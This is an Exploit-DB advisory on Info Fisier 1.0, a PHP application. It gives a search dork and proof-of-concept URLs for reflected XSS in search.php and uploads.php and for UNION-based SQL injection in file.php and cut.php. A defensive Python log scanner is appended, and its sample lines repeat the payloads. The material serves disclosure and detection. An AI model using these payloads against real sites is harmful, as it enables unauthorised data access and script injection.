Info Fisier 1.0 - Multiple Vulnerabilities

2009-12-27T00:00:00
ID EDB-ID:10728
Type exploitdb
Reporter kaozc9
Modified 2009-12-27T00:00:00

Description

Info Fisier 1.0 multiple vulnerabilities. Webapps exploit for the PHP platform.

                                        
################################################################################################
# [+] Author : kaozc9                                                                          #
# [+] Email  : kaozc9@gmail.com                                                                #
# [+] Site   : www.paradisextem.co.cc                                                          #
# [+] Team   : ParadisexTeam                                                                   #
# [+] Dork   : Powered by Info Fisier.                                                         #
################################################################################################
#=========================================XSS==================================================#
#                                                                                              #
# Affected Files:                                                                              #
#               http://server/path/search.php                                                  #
#               http://server/path/uploads.php                                                 #
#                                                                                              #
# POC:                                                                                         #
#     http://server/path/search.php?key=<script>alert(12345);</script>                         #
#     http://server/path/uploads.php?p=<script>alert(12345);</script>                          #
#=========================================SQL==================================================#
#                                                                                              #
# Affected Files:                                                                              #
#               http://server/path/file.php                                                    #
#               http://server/path/cut.php                                                     #
#                                                                                              #
# POC:                                                                                         #
#     http://server/path/file.php?id=-1 union select 1,@@version,3,4,5,6,7,8,9,10,11           #
#     http://server/path/cut.php?id=-1 union select 1,@@version,3,4,5,6,7,8,9,10,11            #
#                                                                                              #
################################################################################################
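
A log check for the four script/parameter pairs listed above, useful for finding out whether an exposed install has already received such requests. This is an added example, not part of the original advisory: the access-log lines are constructed, and the rules that `id` is always a plain non-negative integer and that `key` and `p` never carry angle brackets are assumptions about the application.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script -> (parameter, issue class), from the advisory's "Affected Files" and POC lines.
WATCHED = {
    "search.php": ("key", "xss"),
    "uploads.php": ("p", "xss"),
    "file.php": ("id", "sqli"),
    "cut.php": ("id", "sqli"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(line):
    """Return (script, param, issue) for a suspicious request line, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    if script not in WATCHED:
        return None
    param, issue = WATCHED[script]
    # parse_qs percent-decodes values, so encoded input is checked in decoded form.
    for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
        # Assumption: key/p never legitimately contain angle brackets.
        if issue == "xss" and ("<" in value or ">" in value):
            return (script, param, issue)
        # Assumption: id is always a plain non-negative integer.
        if issue == "sqli" and not re.fullmatch(r"\d+", value):
            return (script, param, issue)
    return None

def scan(lines):
    """Classify every log line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines in combined log format (documentation IP range).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Dec/2009:10:00:01 +0000] "GET /path/file.php?id=42 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [27/Dec/2009:10:00:05 +0000] "GET /path/cut.php?id=-1%20union%20select%201,@@version,3,4,5,6,7,8,9,10,11 HTTP/1.1" 200 4096',
    '192.0.2.11 - - [27/Dec/2009:10:00:09 +0000] "GET /path/search.php?key=%3Cscript%3Ealert(12345)%3B%3C/script%3E HTTP/1.1" 200 2048',
    '192.0.2.12 - - [27/Dec/2009:10:00:12 +0000] "GET /path/search.php?key=holiday+photos HTTP/1.1" 200 2048',
    '192.0.2.13 - - [27/Dec/2009:10:00:15 +0000] "GET /path/uploads.php?p=2 HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same two rules (integer-only `id`, no markup in `key` and `p`) are what the application itself should enforce, together with parameterized queries and HTML-encoding of reflected values.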